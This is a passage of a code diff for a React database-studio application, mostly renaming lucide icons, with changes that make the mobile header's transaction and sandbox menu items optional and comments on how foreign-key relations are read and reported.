+                  {labels?.reindexGlobalDesc ?? "Reconstructs all indexes in the database."}
+                </p>
               </div>
             )}
 

--- a/src/components/admin/tabs/OverviewTab.tsx
+++ b/src/components/admin/tabs/OverviewTab.tsx
@@ -27,8 +27,8 @@ import {
   Wrench,
   Shield,
   ArrowRight,
-  CheckCircle2,
-  XCircle,
+  CircleCheck,
+  CircleX,
   Link2,
   HardDrive,
   Sparkles,
@@ -989,9 +989,9 @@ function AnalyticsSection({
                     </div>
                     <div className="flex items-center gap-1.5 flex-shrink-0">
                       {item.status === "success" ? (
-                        <CheckCircle2 className="w-3 h-3 text-emerald-500" />
+                        <CircleCheck className="w-3 h-3 text-emerald-500" />
                       ) : (
-                        <XCircle className="w-3 h-3 text-red-500" />
+                        <CircleX className="w-3 h-3 text-red-500" />
                       )}
                       <span className="text-xs text-fg-subtle whitespace-nowrap">{formatRelativeTime(item.time)}</span>
                     </div>

--- a/src/components/agent/AgentRail.tsx
+++ b/src/components/agent/AgentRail.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import React, { useEffect, useRef, useState } from "react";
-import { Bot, ChevronDown, ChevronRight, Loader2, PencilLine, Play, Square, TriangleAlert } from "lucide-react";
+import { Bot, ChevronDown, ChevronRight, LoaderCircle, PencilLine, Play, Square, TriangleAlert } from "lucide-react";
 import { CopyButton } from "@/components/copy-button";
 import { renderProse } from "@/components/rich-text";
 import { Sheet, SheetContent, SheetHeader, SheetTitle } from "@/components/ui/sheet";
@@ -1977,7 +1977,7 @@ export function AgentRail({
         */}
         {classifying && (
           <p data-testid="agent-classifying" className="mt-2 flex items-center gap-1 text-[0.625rem] text-fg-muted">
-            <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin" aria-hidden="true" />
+            <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin" aria-hidden="true" />
             Reading your objective to choose a workflow.
           </p>
         )}
@@ -2167,7 +2167,7 @@ export function AgentRail({
               className="flex items-center gap-1 px-2 py-1 rounded text-xs bg-blue-500/15 text-blue-300 hover:bg-blue-500/25 disabled:opacity-40 disabled:hover:bg-blue-500/15 transition-colors"
             >
               {run.isBusy || classifying ? (
-                <Loader2 strokeWidth={1.5} className="w-3 h-3 animate-spin" />
+                <LoaderCircle strokeWidth={1.5} className="w-3 h-3 animate-spin" />
               ) : (
                 <Play strokeWidth={1.5} className="w-3 h-3" />
               )}

--- a/src/components/agent/AnswerCard.tsx
+++ b/src/components/agent/AnswerCard.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import type { ReactNode } from "react";
-import { Loader2, PencilLine, RotateCcw, Square, TriangleAlert } from "lucide-react";
+import { LoaderCircle, PencilLine, RotateCcw, Square, TriangleAlert } from "lucide-react";
 import { CopyButton } from "@/components/copy-button";
 import { renderProse } from "@/components/rich-text";
 import type { AgentChartSpec, AgentRunStatus } from "@/lib/agent/types";
@@ -811,7 +811,7 @@ function RunningAnswer({
   return (
     <div data-testid="agent-answer-running" className="mt-1.5">
       <p data-testid="agent-answer-step" className="flex items-center gap-1.5 text-xs text-fg-secondary">
-        <Loader2 strokeWidth={1.5} className="w-3 h-3 shrink-0 animate-spin" aria-hidden="true" />
+        <LoaderCircle strokeWidth={1.5} className="w-3 h-3 shrink-0 animate-spin" aria-hidden="true" />
         {current?.headline}
       </p>
       {current?.detail !== undefined && <p className="mt-0.5 pl-4.5 text-[0.625rem] text-fg-muted">{current.detail}</p>}

--- a/src/components/monitoring/tabs/PerformanceTab.tsx
+++ b/src/components/monitoring/tabs/PerformanceTab.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import React from "react";
-import { Activity, Gauge, Zap, AlertTriangle } from "lucide-react";
+import { Activity, Gauge, Zap, TriangleAlert } from "lucide-react";
 import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
 import { Progress } from "@/components/ui/progress";
 import { Skeleton } from "@/components/ui/skeleton";
@@ -223,7 +223,7 @@ export function PerformanceTab({ data, loading, history = [] }: PerformanceTabPr
         <Card className={`p-0 border-2 transition-colors ${getThresholdColor(deadlockThreshold)}`}>
           <CardHeader className="flex flex-row items-center justify-between space-y-0 p-2 sm:p-4 pb-1 sm:pb-2">
             <CardTitle className="text-xs sm:text-xs font-medium text-muted-foreground">Deadlocks</CardTitle>
-            <AlertTriangle className={`h-3 w-3 sm:h-4 sm:w-4 ${deadlockIconClass(deadlocks)}`} />
+            <TriangleAlert className={`h-3 w-3 sm:h-4 sm:w-4 ${deadlockIconClass(deadlocks)}`} />
           </CardHeader>
           <CardContent className="p-2 sm:p-4 pt-0">
             {deadlocks === undefined ? (
@@ -299,7 +299,7 @@ export function PerformanceTab({ data, loading, history = [] }: PerformanceTabPr
                 nothing to advise about a cache nobody measured. */}
             {cacheHitRatio !== undefined && cacheHitRatio < 90 && (
               <div className="flex items-start gap-2 p-2 bg-yellow-500/10 rounded-md">
-                <AlertTriangle
+                <TriangleAlert
                   strokeWidth={1.5}
                   className="h-3 w-3 sm:h-4 sm:w-4 text-yellow-500 mt-0.5 flex-shrink-0"
                 />
@@ -311,7 +311,7 @@ export function PerformanceTab({ data, loading, history = [] }: PerformanceTabPr
             )}
             {(performance?.deadlocks ?? 0) > 0 && (
               <div className="flex items-start gap-2 p-2 bg-red-500/10 rounded-md">
-                <AlertTriangle strokeWidth={1.5} className="h-3 w-3 sm:h-4 sm:w-4 text-red-500 mt-0.5 flex-shrink-0" />
+                <TriangleAlert strokeWidth={1.5} className="h-3 w-3 sm:h-4 sm:w-4 text-red-500 mt-0.5 flex-shrink-0" />
                 <div>
                   <p className="text-xs sm:text-xs font-medium">Deadlocks</p>
                   <p className="text-xs sm:text-xs text-muted-foreground hidden sm:block">Review lock ordering</p>

--- a/src/components/monitoring/tabs/PoolTab.tsx
+++ b/src/components/monitoring/tabs/PoolTab.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import React, { useState, useEffect, useCallback } from "react";
-import { Server, Activity, Clock, Loader2, RefreshCw } from "lucide-react";
+import { Server, Activity, Clock, LoaderCircle, RefreshCw } from "lucide-react";
 import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
 import { Badge } from "@/components/ui/badge";
 import { Progress } from "@/components/ui/progress";
@@ -64,7 +64,7 @@ export function PoolTab({ connection }: PoolTabProps) {
   if (loading && !stats) {
     return (
       <div className="flex items-center justify-center h-full gap-2 text-muted-foreground">
-        <Loader2 strokeWidth={1.5} className="h-4 w-4 animate-spin" />
+        <LoaderCircle strokeWidth={1.5} className="h-4 w-4 animate-spin" />
         Loading pool statistics...
       </div>
     );

--- a/src/components/monitoring/tabs/QueriesTab.tsx
+++ b/src/components/monitoring/tabs/QueriesTab.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import React, { useState } from "react";
-import { Clock, AlertTriangle, Search, ArrowUpDown } from "lucide-react";
+import { Clock, TriangleAlert, Search, ArrowUpDown } from "lucide-react";
 import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
 import { Badge } from "@/components/ui/badge";
 import { Skeleton } from "@/components/ui/skeleton";
@@ -105,7 +105,7 @@ export function QueriesTab({ data, loading, labels }: QueriesTabProps) {
         <Card className="p-0">
           <CardHeader className="flex flex-row items-center justify-between space-y-0 p-2 sm:p-4 pb-1 sm:pb-2">
             <CardTitle className="text-xs sm:text-xs font-medium text-muted-foreground">Slow</CardTitle>
-            <AlertTriangle
+            <TriangleAlert
               className={`h-3 w-3 sm:h-4 sm:w-4 ${slowCount > 0 ? "text-yellow-500" : "text-muted-foreground"}`}
             />
           </CardHeader>

--- a/src/components/monitoring/tabs/SessionsTab.tsx
+++ b/src/components/monitoring/tabs/SessionsTab.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import React, { useState } from "react";
-import { Users, Skull, Activity, Clock, Loader2 } from "lucide-react";
+import { Users, Skull, Activity, Clock, LoaderCircle } from "lucide-react";
 import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
 import { Badge } from "@/components/ui/badge";
 import { Button } from "@/components/ui/button";
@@ -207,7 +207,7 @@ export function SessionsTab({ data, loading, onKillSession, isAdmin = true }: Se
                             disabled={killingPid === session.pid}
                           >
                             {killingPid === session.pid ? (
-                              <Loader2 strokeWidth={1.5} className="h-3 w-3 sm:h-4 sm:w-4 animate-spin" />
+                              <LoaderCircle strokeWidth={1.5} className="h-3 w-3 sm:h-4 sm:w-4 animate-spin" />
                             ) : (
                               <Skull strokeWidth={1.5} className="h-3 w-3 sm:h-4 sm:w-4" />
                             )}

--- a/src/components/monitoring/tabs/TablesTab.tsx
+++ b/src/components/monitoring/tabs/TablesTab.tsx
@@ -1,7 +1,7 @@
 "use client";
 
 import React, { useState } from "react";
-import { Table2, Search, AlertTriangle, Loader2, RefreshCw, Zap, type LucideIcon } from "lucide-react";
+import { Table2, Search, TriangleAlert, LoaderCircle, RefreshCw, Zap, type LucideIcon } from "lucide-react";
 import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
 import { Badge } from "@/components/ui/badge";
 import { Button } from "@/components/ui/button";
@@ -190,7 +190,7 @@ export function TablesTab({ data, loading, onRunMaintenance, isAdmin = true, cap
         <Card className="p-0">
           <CardHeader className="flex flex-row items-center justify-between space-y-0 p-2 sm:p-4 pb-1 sm:pb-2">
             <CardTitle className="text-xs sm:text-xs font-medium text-muted-foreground">Vacuum</CardTitle>
-            <AlertTriangle
+            <TriangleAlert
               className={`h-3 w-3 sm:h-4 sm:w-4 ${vacuumIconClass(vacuumStateKnown, tablesNeedingVacuum)}`}
             />
           </CardHeader>
@@ -292,7 +292,7 @@ export function TablesTab({ data, loading, onRunMaintenance, isAdmin = true, cap
                                 title={label}
                               >
                                 {actionLoading === `${type}-${table.tableName}` ? (
-                                  <Loader2 strokeWidth={1.5} className="h-3 w-3 animate-spin" />
+                                  <LoaderCircle strokeWidth={1.5} className="h-3 w-3 animate-spin" />
                                 ) : (
                                   <Icon strokeWidth={1.5} className="h-3 w-3" />
                                 )}

--- a/src/components/results-grid/RowDetailSheet.tsx
+++ b/src/components/results-grid/RowDetailSheet.tsx
@@ -2,7 +2,7 @@
 
 import React, { useState, useCallback } from "react";
 import { cn } from "@/lib/utils";
-import { Copy, FileJson, Check, Eye, Lock, TriangleAlert } from "lucide-react";
+import { Copy, FileBraces, Check, Eye, Lock, TriangleAlert } from "lucide-react";
 import { Sheet, SheetContent, SheetHeader, SheetTitle } from "@/components/ui/sheet";
 import { Button } from "@/components/ui/button";
 import { ScrollArea } from "@/components/ui/scroll-area";
@@ -109,7 +109,7 @@ export function RowDetailSheet({
           <div className="flex items-center justify-between">
             <SheetTitle className="text-fg flex items-center gap-2">
               <div className="w-8 h-8 rounded-lg bg-blue-500/10 flex items-center justify-center">
-                <FileJson strokeWidth={1.5} className="w-3.5 h-3.5 text-blue-400" />
+                <FileBraces strokeWidth={1.5} className="w-3.5 h-3.5 text-blue-400" />
               </div>
               Row #{rowIndex + 1}
             </SheetTitle>

--- a/src/components/results-grid/StatsBar.tsx
+++ b/src/components/results-grid/StatsBar.tsx
@@ -3,7 +3,7 @@
 import React from "react";
 import { QueryResult } from "@/lib/types";
 import { cn } from "@/lib/utils";
-import { ChevronDown, LayoutGrid, Table2, Loader2, EyeOff, Eye, Save, X, Filter, Lock } from "lucide-react";
+import { ChevronDown, LayoutGrid, Table2, LoaderCircle, EyeOff, Eye, Save, X, Funnel, Lock } from "lucide-react";
 import { Button } from "@/components/ui/button";
 import type { CellChange } from "@/components/ResultsGrid";
 import { describeWarning } from "@/components/results-grid/utils";
@@ -68,7 +68,7 @@ export function StatsBar({
             onClick={onClearFilters}
             title="Clear all filters"
           >
-            <Filter strokeWidth={1.5} className="w-3 h-3" />
+            <Funnel strokeWidth={1.5} className="w-3 h-3" />
             {activeFilterCount} filter{activeFilterCount > 1 ? "s" : ""} &bull; {filteredRowCount} shown
             <X strokeWidth={1.5} className="w-3 h-3" />
           </button>
@@ -180,7 +180,7 @@ export function LoadMoreFooter({ hasMore, onLoadMore, isLoadingMore }: LoadMoreF
       >
         {isLoadingMore && (
           <>
-            <Loader2 strokeWidth={1.5} className="w-3 h-3 mr-2 animate-spin" />
+            <LoaderCircle strokeWidth={1.5} className="w-3 h-3 mr-2 animate-spin" />
             {LOADING_LABEL}
           </>
         )}

--- a/src/components/schema-explorer/SchemaExplorer.tsx
+++ b/src/components/schema-explorer/SchemaExplorer.tsx
@@ -3,7 +3,7 @@
 import React, { useState, useMemo, useCallback } from "react";
 import { TableSchema } from "@/lib/types";
 import type { ProviderMetadata } from "@/hooks/use-provider-metadata";
-import { Search, Hash, Loader2, AlertCircle, Database, Plus, Settings } from "lucide-react";
+import { Search, Hash, LoaderCircle, CircleAlert, Database, Plus, Settings } from "lucide-react";
 import { Button } from "@/components/ui/button";
 import { Input } from "@/components/ui/input";
 import { AnimatePresence } from "framer-motion";
@@ -69,7 +69,7 @@ export function SchemaExplorer({
     return (
       <div className="flex flex-col items-center justify-center py-12 text-muted-foreground">
         <div className="relative mb-4">
-          <Loader2 strokeWidth={1.5} className="w-8 h-8 animate-spin text-blue-500/20" />
+          <LoaderCircle strokeWidth={1.5} className="w-8 h-8 animate-spin text-blue-500/20" />
           <Database strokeWidth={1.5} className="w-3.5 h-3.5 absolute inset-0 m-auto text-blue-500 animate-pulse" />
         </div>
         <span className="text-xs font-medium animate-pulse">Scanning Schema...</span>
@@ -81,7 +81,7 @@ export function SchemaExplorer({
     return (
       <div className="flex flex-col items-center justify-center py-12 px-6 text-center">
         <div className="w-12 h-12 rounded-full bg-muted flex items-center justify-center mb-4 border border-border">
-          <AlertCircle strokeWidth={1.5} className="w-6 h-6 text-muted-foreground" />
+          <CircleAlert strokeWidth={1.5} className="w-6 h-6 text-muted-foreground" />
         </div>
         <h3 className="text-foreground text-xs font-medium mb-1">No structures found</h3>
         <p className="text-xs text-muted-foreground leading-relaxed">

--- a/src/components/schema-explorer/TableItem.tsx
+++ b/src/components/schema-explorer/TableItem.tsx
@@ -6,13 +6,13 @@ import {
   Table as TableIcon,
   Play,
   ChevronRight,
-  Filter,
-  MoreVertical,
+  Funnel,
+  EllipsisVertical,
   Copy,
   Trash2,
   Code,
-  BarChart3,
-  Wand2,
+  ChartColumn,
+  WandSparkles,
 } from "lucide-react";
 import { Button } from "@/components/ui/button";
 import { cn } from "@/lib/utils";
@@ -97,7 +97,7 @@ function renderMenuItems({
         {labels?.selectAction || "Select Top 50"}
       </Item>
       <Item onClick={() => callbacks.onGenerateSelect?.(table.name)}>
-        <Filter strokeWidth={1.5} className="w-3.5 h-3.5 mr-2 text-blue-500" />
+        <Funnel strokeWidth={1.5} className="w-3.5 h-3.5 mr-2 text-blue-500" />
         {labels?.generateAction || "Generate Query"}
       </Item>
       <Item onClick={() => copyToClipboard(table.name, `${labels?.entityName || "Table"} name`)}>
@@ -109,7 +109,7 @@ function renderMenuItems({
       <Separator />
       {rowsAreAddressable && (
         <Item onClick={() => callbacks.onProfileTable?.(table.name)}>
-          <BarChart3 strokeWidth={1.5} className="w-3.5 h-3.5 mr-2 text-cyan-500" />
+          <ChartColumn strokeWidth={1.5} className="w-3.5 h-3.5 mr-2 text-cyan-500" />
           {"Profile Table"}
         </Item>
       )}
@@ -119,7 +119,7 @@ function renderMenuItems({
       </Item>
       {rowsAreAddressable && (
         <Item onClick={() => callbacks.onGenerateTestData?.(table.name)}>
-          <Wand2 strokeWidth={1.5} className="w-3.5 h-3.5 mr-2 text-amber-500" />
+          <WandSparkles strokeWidth={1.5} className="w-3.5 h-3.5 mr-2 text-amber-500" />
           {"Generate Test Data"}
         </Item>
       )}
@@ -237,7 +237,7 @@ export const TableItem = React.memo(function TableItem({
                     className="absolute inset-0 w-full h-full opacity-0 group-hover:opacity-100 [@media(hover:none)]:opacity-100 focus-within:opacity-100 transition-opacity hover:bg-accent flex items-center justify-center"
                     onClick={(e) => e.stopPropagation()}
                   >
-                    <MoreVertical
+                    <EllipsisVertical
                       strokeWidth={1.5}
                       className="w-3.5 h-3.5 text-muted-foreground group-hover:text-foreground"
                     />

--- a/src/components/studio/BottomPanel.tsx
+++ b/src/components/studio/BottomPanel.tsx
@@ -17,7 +17,7 @@ import type { ResultExportFormat } from "@/lib/export/result-export";
 import { resolveExplainPlan } from "@/lib/explain";
 import { cn } from "@/lib/utils";
 import {
-  BarChart3,
+  ChartColumn,
   Bookmark,
   Clock,
   Columns3,
@@ -269,7 +269,7 @@ export function BottomPanel({
     {
       key: "charts",
       label: "Charts",
-      icon: <BarChart3 strokeWidth={1.5} className="w-3 h-3" />,
+      icon: <ChartColumn strokeWidth={1.5} className="w-3 h-3" />,
       activeClass: "text-cyan-400 border-cyan-500 bg-fill",
     },
     {

--- a/src/components/studio/StudioMobileHeader.tsx
+++ b/src/components/studio/StudioMobileHeader.tsx
@@ -59,10 +59,20 @@ interface StudioMobileHeaderProps {
   onClearQuery: () => void;
   onExecuteQuery: () => void;
   onCancelQuery: () => void;
-  onBeginTransaction: () => void;
-  onCommitTransaction: () => void;
-  onRollbackTransaction: () => void;
-  onTogglePlayground: () => void;
+  /**
+   * The transaction trio, supplied together or not at all — the same contract
+   * `QueryToolbar` states. A caller whose provider declares no transaction session
+   * omits all three and BEGIN/COMMIT/ROLLBACK do not render, instead of offering
+   * three items that answer HTTP 400 (#U13).
+   */
+  onBeginTransaction?: () => void;
+  onCommitTransaction?: () => void;
+  onRollbackTransaction?: () => void;
+  /**
+   * Omitted where the caller cannot run sandboxed queries: the sandbox auto-rolls-back
+   * through the same transaction route, so it is withheld with the trio (#U13).
+   */
+  onTogglePlayground?: () => void;
   /** Omitted where the provider declares no inline row editing (issue #269). */
   onToggleEditing?: () => void;
   onImport: () => void;
@@ -108,6 +118,13 @@ export function StudioMobileHeader({
   onAskAgent,
 }: StudioMobileHeaderProps) {
   const router = useRouter();
+  // Bundled so the three cannot be half-supplied, the rule QueryToolbar follows: an
+  // item that BEGINs without one that COMMITs would strand the user inside a
+  // transaction it cannot close.
+  const transaction =
+    onBeginTransaction && onCommitTransaction && onRollbackTransaction
+      ? { begin: onBeginTransaction, commit: onCommitTransaction, rollback: onRollbackTransaction }
+      : null;
 
   return (
     <header className="md:hidden border-b border-hairline bg-surface/95 backdrop-blur-xl sticky top-0 z-30">
@@ -292,29 +309,35 @@ export function StudioMobileHeader({
                   <span className="text-[0.625rem] font-medium text-fg-subtle">Advanced</span>
                 </div>
 
-                {!transactionActive ? (
-                  <DropdownMenuItem
-                    onClick={onBeginTransaction}
-                    className="cursor-pointer text-xs"
-                    disabled={!activeConnection}
-                  >
-                    <PlayCircle strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> BEGIN Transaction
-                  </DropdownMenuItem>
-                ) : (
-                  <>
-                    <DropdownMenuItem onClick={onCommitTransaction} className="cursor-pointer text-xs text-emerald-400">
-                      <PlayCircle strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> COMMIT
+                {transaction !== null &&
+                  (!transactionActive ? (
+                    <DropdownMenuItem
+                      onClick={transaction.begin}
+                      className="cursor-pointer text-xs"
+                      disabled={!activeConnection}
+                    >
+                      <PlayCircle strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> BEGIN Transaction
                     </DropdownMenuItem>
-                    <DropdownMenuItem onClick={onRollbackTransaction} className="cursor-pointer text-xs text-red-400">
-                      <PlayCircle strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> ROLLBACK
-                    </DropdownMenuItem>
-                  </>
-                )}
+                  ) : (
+                    <>
+                      <DropdownMenuItem
+                        onClick={transaction.commit}
+                        className="cursor-pointer text-xs text-emerald-400"
+                      >
+                        <PlayCircle strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> COMMIT
+                      </DropdownMenuItem>
+                      <DropdownMenuItem onClick={transaction.rollback} className="cursor-pointer text-xs text-red-400">
+                        <PlayCircle strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> ROLLBACK
+                      </DropdownMenuItem>
+                    </>
+                  ))}
 
-                <DropdownMenuItem onClick={onTogglePlayground} className="cursor-pointer text-xs">
-                  <Pencil strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" />
-                  {playgroundMode ? "Disable Sandbox" : "Enable Sandbox"}
-                </DropdownMenuItem>
+                {onTogglePlayground && (
+                  <DropdownMenuItem onClick={onTogglePlayground} className="cursor-pointer text-xs">
+                    <Pencil strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" />
+                    {playgroundMode ? "Disable Sandbox" : "Enable Sandbox"}
+                  </DropdownMenuItem>
+                )}
 
                 {onToggleEditing && (
                   <DropdownMenuItem onClick={onToggleEditing} className="cursor-pointer text-xs">

--- a/src/components/studio/StudioMobileHeader.tsx
+++ b/src/components/studio/StudioMobileHeader.tsx
@@ -6,18 +6,18 @@ import type { QueryEditorRef } from "@/components/QueryEditor";
 import { useRouter } from "next/navigation";
 import { cn } from "@/lib/utils";
 import {
-  AlignLeft,
+  TextAlignStart,
   Bot,
   ChevronDown,
   Copy,
   Database,
-  Edit3,
+  PenLine,
   Gauge,
   LogOut,
-  MoreVertical,
+  EllipsisVertical,
   Pencil,
   Play,
-  PlayCircle,
+  CirclePlay,
   Plus,
   Save,
   Settings,
@@ -266,12 +266,12 @@ export function StudioMobileHeader({
             <DropdownMenu>
               <DropdownMenuTrigger asChild>
                 <Button variant="ghost" size="sm" className="h-7 px-2 gap-1 text-xs text-fg-muted">
-                  <MoreVertical strokeWidth={1.5} className="w-3 h-3" />
+                  <EllipsisVertical strokeWidth={1.5} className="w-3 h-3" />
                 </Button>
               </DropdownMenuTrigger>
               <DropdownMenuContent align="start" className="bg-raised border-hairline-strong w-48">
                 <DropdownMenuItem onClick={() => queryEditorRef.current?.format()} className="cursor-pointer text-xs">
-                  <AlignLeft strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> Format SQL
+                  <TextAlignStart strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> Format SQL
                 </DropdownMenuItem>
                 <DropdownMenuItem
                   onClick={() => {
@@ -316,7 +316,7 @@ export function StudioMobileHeader({
                       className="cursor-pointer text-xs"
                       disabled={!activeConnection}
                     >
-                      <PlayCircle strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> BEGIN Transaction
+                      <CirclePlay strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> BEGIN Transaction
                     </DropdownMenuItem>
                   ) : (
                     <>
@@ -324,10 +324,10 @@ export function StudioMobileHeader({
                         onClick={transaction.commit}
                         className="cursor-pointer text-xs text-emerald-400"
                       >
-                        <PlayCircle strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> COMMIT
+                        <CirclePlay strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> COMMIT
                       </DropdownMenuItem>
                       <DropdownMenuItem onClick={transaction.rollback} className="cursor-pointer text-xs text-red-400">
-                        <PlayCircle strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> ROLLBACK
+                        <CirclePlay strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" /> ROLLBACK
                       </DropdownMenuItem>
                     </>
                   ))}
@@ -341,7 +341,7 @@ export function StudioMobileHeader({
 
                 {onToggleEditing && (
                   <DropdownMenuItem onClick={onToggleEditing} className="cursor-pointer text-xs">
-                    <Edit3 strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" />
+                    <PenLine strokeWidth={1.5} className="w-3.5 h-3.5 mr-2" />
                     {editingEnabled ? "Disable Editing" : "Enable Editing"}
                   </DropdownMenuItem>
                 )}

--- a/src/components/studio/StudioTabBar.tsx
+++ b/src/components/studio/StudioTabBar.tsx
@@ -3,7 +3,7 @@
 import React, { type Dispatch, type SetStateAction } from "react";
 import type { QueryTab } from "@/lib/types";
 import { cn } from "@/lib/utils";
-import { FileJson, Hash, Plus, X } from "lucide-react";
+import { FileBraces, Hash, Plus, X } from "lucide-react";
 
 interface StudioTabBarProps {
   tabs: QueryTab[];
@@ -75,7 +75,7 @@ export function StudioTabBar({
               {tab.type === "sql" ? (
                 <Hash strokeWidth={1.5} className="w-3 h-3" />
               ) : (
-                <FileJson strokeWidth={1.5} className="w-3 h-3" />
+                <FileBraces strokeWidth={1.5} className="w-3 h-3" />
               )}
               <input
                 autoFocus
@@ -123,7 +123,7 @@ export function StudioTabBar({
               {tab.type === "sql" ? (
                 <Hash strokeWidth={1.5} className="w-3 h-3" />
               ) : (
-                <FileJson strokeWidth={1.5} className="w-3 h-3" />
+                <FileBraces strokeWidth={1.5} className="w-3 h-3" />
               )}
               <span className="text-xs truncate font-medium">{tab.name}</span>
             </button>

--- a/src/components/ui/breadcrumb.tsx
+++ b/src/components/ui/breadcrumb.tsx
@@ -1,6 +1,6 @@
 import * as React from "react";
 import { Slot } from "@radix-ui/react-slot";
-import { ChevronRight, MoreHorizontal } from "lucide-react";
+import { ChevronRight, Ellipsis } from "lucide-react";
 
 import { cn } from "@/lib/utils";
 
@@ -75,7 +75,7 @@ function BreadcrumbEllipsis({ className, ...props }: React.ComponentProps<"span"
       className={cn("flex size-9 items-center justify-center", className)}
       {...props}
     >
-      <MoreHorizontal className="size-4" />
+      <Ellipsis className="size-4" />
       <span className="sr-only">More</span>
     </span>
   );

--- a/src/components/ui/pagination.tsx
+++ b/src/components/ui/pagination.tsx
@@ -1,5 +1,5 @@
 import * as React from "react";
-import { ChevronLeftIcon, ChevronRightIcon, MoreHorizontalIcon } from "lucide-react";
+import { ChevronLeftIcon, ChevronRightIcon, EllipsisIcon } from "lucide-react";
 
 import { cn } from "@/lib/utils";
 import { Button, buttonVariants } from "@/components/ui/button";
@@ -83,7 +83,7 @@ function PaginationEllipsis({ className, ...props }: React.ComponentProps<"span"
       className={cn("flex size-9 items-center justify-center", className)}
       {...props}
     >
-      <MoreHorizontalIcon className="size-4" />
+      <EllipsisIcon className="size-4" />
       <span className="sr-only">More pages</span>
     </span>
   );

--- a/src/components/ui/sonner.tsx
+++ b/src/components/ui/sonner.tsx
@@ -1,6 +1,6 @@
 "use client";
 
-import { CircleCheckIcon, InfoIcon, Loader2Icon, OctagonXIcon, TriangleAlertIcon } from "lucide-react";
+import { CircleCheckIcon, InfoIcon, LoaderCircleIcon, OctagonXIcon, TriangleAlertIcon } from "lucide-react";
 import { useTheme } from "next-themes";
 import { Toaster as Sonner, type ToasterProps } from "sonner";
 
@@ -16,7 +16,7 @@ const Toaster = ({ ...props }: ToasterProps) => {
         info: <InfoIcon className="size-4" />,
         warning: <TriangleAlertIcon className="size-4" />,
         error: <OctagonXIcon className="size-4" />,
-        loading: <Loader2Icon className="size-4 animate-spin" />,
+        loading: <LoaderCircleIcon className="size-4 animate-spin" />,
       }}
       style={
         {

--- a/src/components/ui/spinner.tsx
+++ b/src/components/ui/spinner.tsx
@@ -1,9 +1,11 @@
-import { Loader2Icon } from "lucide-react";
+import { LoaderCircleIcon } from "lucide-react";
 
 import { cn } from "@/lib/utils";
 
 function Spinner({ className, ...props }: React.ComponentProps<"svg">) {
-  return <Loader2Icon role="status" aria-label="Loading" className={cn("size-4 animate-spin", className)} {...props} />;
+  return (
+    <LoaderCircleIcon role="status" aria-label="Loading" className={cn("size-4 animate-spin", className)} {...props} />
+  );
 }
 
 export { Spinner };

--- a/src/lib/agent/composed-sql.ts
+++ b/src/lib/agent/composed-sql.ts
@@ -174,8 +174,10 @@ function composePostgresCatalog(selector: AgentCatalogSelector): string {
  * role `docs/AGENT_DEMO.md` tells operators to create holds `SELECT` and nothing
  * else, so those views answered NOTHING for it — measured on the seeded dvdrental as
  * `libredb_agent`: 0 rows where `pg_constraint WHERE contype = 'f'` holds 18, and a
- * run then reported that the database declares no foreign keys (`docs/BACKLOG.md`
- * B44). `pg_constraint` needs only `USAGE` on the schema, and answers all 18.
+ * run then reported that the database declares no foreign keys. `pg_constraint` needs
+ * only `USAGE` on the schema, and answers all 18. What the rewrite cannot reach is that
+ * ANY role can be narrower than its database, so the relations block declines to report
+ * an absence from an empty read at all — see `er-diagram.ts`.
  *
  * The same rewrite is what pairs a composite key. Neither view exposes an ordinal,
  * so `FOREIGN KEY (x, y) REFERENCES parents (a, b)` came back as the cross-product

--- a/src/lib/agent/er-diagram.ts
+++ b/src/lib/agent/er-diagram.ts
@@ -224,34 +224,45 @@ function groupByPair(relations: readonly Relation[]): readonly (readonly Relatio
 }
 
 /**
- * The relation list, or a sentence saying there is none.
+ * The relation list, or a sentence about why there is none.
  *
- * The empty case is worth its own words: a database whose tables declare no foreign
- * keys is a real and common shape, and a reader shown an empty list would not know
- * whether the run failed to look.
+ * The empty case is worth its own words: a reader shown an empty list would not know
+ * whether the run failed to look, and the two ways it can be empty are not the same
+ * fact.
  *
  * TWO empty sentences since #414, because an empty relations read means two different
- * things and the hedge could only cover one of them. The hedge offers "that may be how
- * the schema is" and "the keys may be enforced by the application" — both of which are
- * claims about a database that COULD have declared foreign keys and did not. Grounding
- * reached MongoDB, Redis, LibreDB, Druid, ClickHouse and Couchbase, where there is no
- * such construct to decline: on those engines both branches of the hedge are wrong at
- * once, and the reader is invited to wonder about a schema decision nobody made.
+ * things and one sentence could only cover one of them. Grounding reached MongoDB,
+ * Redis, LibreDB, Druid, ClickHouse and Couchbase, where a foreign key is not a
+ * construct to decline: any sentence about what this schema does or does not declare is
+ * wrong there, and the reader is invited to wonder about a schema decision nobody made.
  *
  * `engineDeclaresForeignKeys` is `ProviderCapabilities.declaresForeignKeys`, and it is
  * a capability rather than an engine check for the rule `CLAUDE.md` states: engine
  * behaviour is declared by the provider that has it, and `=== 'mongodb'` outside a
  * provider class is how six of these would have been listed here and the seventh
  * forgotten. The flag is optional on the published interface, so this reads `=== false`
- * and an absent value keeps the hedge — the weaker claim, which is the right default
- * for an engine nobody has decided about.
